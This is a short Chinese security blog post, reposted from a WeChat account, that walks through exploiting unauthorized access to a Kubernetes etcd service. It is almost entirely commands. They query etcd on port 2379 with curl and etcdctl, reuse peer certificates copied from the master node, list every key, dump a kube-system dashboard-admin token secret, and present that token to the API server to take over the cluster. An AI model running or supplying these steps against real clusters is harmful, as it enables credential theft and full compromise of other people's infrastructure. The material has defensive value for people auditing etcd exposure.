#使用curl访问curl https://172.16.200.70:2379/version -k#使用etcdctl访问./etcdctl --endpoints=https://172.16.200.70:2379/ get / --prefix --keys-only
#目标master节点上的证书/etc/kubernetes/pki/etcd/peer.crt/etc/kubernetes/pki/etcd/ca.crt/etc/kubernetes/pki/etcd/peer.key#将这三个认证所需的文件放在本地的etcdctl所在目录,然后导入export ETCDCTL_CERT=peer.crtexport ETCDCTL_CACERT=ca.crtexport ETCDCTL_KEY=peer.key./etcdctl --endpoints=https://172.16.200.70:2379/ get / --prefix --keys-only
etcd未授权访问
{etcdserver: "3.2.24", etcdcluster: "3.2.0"}或{"action":"get","node":{"dir":true}}
查找Token,接管K8s集群
#查找所有的secretETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://172.16.200.70:2379/ get / --prefix --keys-only|sort|uniq| grep secret#查找指定decret保存的证书和tokenETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://172.16.200.70:2379/ get /registry/secrets/kube-system/dashboard-admin-token-c7spp
curl --header "Authorization: Token" -X GET https://172.16.200.70:6443/api -k
End
原文始发于微信公众号(谢公子学安全):K8s etcd未授权访问
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论